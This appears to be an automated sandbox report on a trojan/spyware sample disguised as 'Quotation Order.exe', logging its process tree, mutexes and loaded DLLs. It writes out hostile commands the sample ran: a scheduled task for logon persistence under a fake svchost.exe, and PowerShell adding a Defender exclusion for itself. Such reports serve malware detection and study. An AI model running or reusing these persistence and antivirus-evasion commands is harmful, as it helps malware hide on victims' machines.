                    Source: 17.2.svchost.exe.1fc9f239308.2.raw.unpack, sDtvQjPGfa.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 17.2.svchost.exe.1fc9f239308.2.raw.unpack, sDtvQjPGfa.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 17.2.svchost.exe.1fc9f239308.2.raw.unpack, sDtvQjPGfa.csCryptographic APIs: 'TransformFinalBlock'
                    Source: svchost.exe, 0000000F.00000002.1481132072.00000153BE8F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbxko
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@85/46@2/2
                    Source: C:\Users\user\Desktop\Quotation Order.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to behavior
                    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8164
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5336:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7928:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7480:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4444:120:WilError_03
                    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8072
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7516:120:WilError_03
                    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7412
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7476:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7496:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5748:120:WilError_03
                    Source: C:\Users\user\Desktop\Quotation Order.exeFile created: C:\Users\user\AppData\Local\Temp\tmp25B.tmpJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp25B.tmp.bat""
                    Source: Quotation Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Quotation Order.exeStatic file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Quotation Order.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: Quotation Order.exeReversingLabs: Detection: 31%
                    Source: Quotation Order.exeVirustotal: Detection: 28%
                    Source: C:\Users\user\Desktop\Quotation Order.exeFile read: C:\Users\user\Desktop\Quotation Order.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Quotation Order.exe "C:\Users\user\Desktop\Quotation Order.exe"
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp25B.tmp.bat""
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 428 -p 8072 -ip 8072
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8072 -s 1276
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 212 -p 8164 -ip 8164
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8164 -s 1688
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 552 -p 7412 -ip 7412
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7412 -s 1648
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe "C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe"
                    Source: C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exitJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp25B.tmp.bat""Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -ForceJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -ForceJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 428 -p 8072 -ip 8072
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8072 -s 1276
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 212 -p 8164 -ip 8164
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8164 -s 1688
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 552 -p 7412 -ip 7412
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7412 -s 1648
                    Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                    Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                    Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
                    Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                    Source: C:\Users\user\Desktop\Quotation Order.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation Order.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: moshost.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mapsbtsvc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mosstorage.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mapconfiguration.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsusererclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
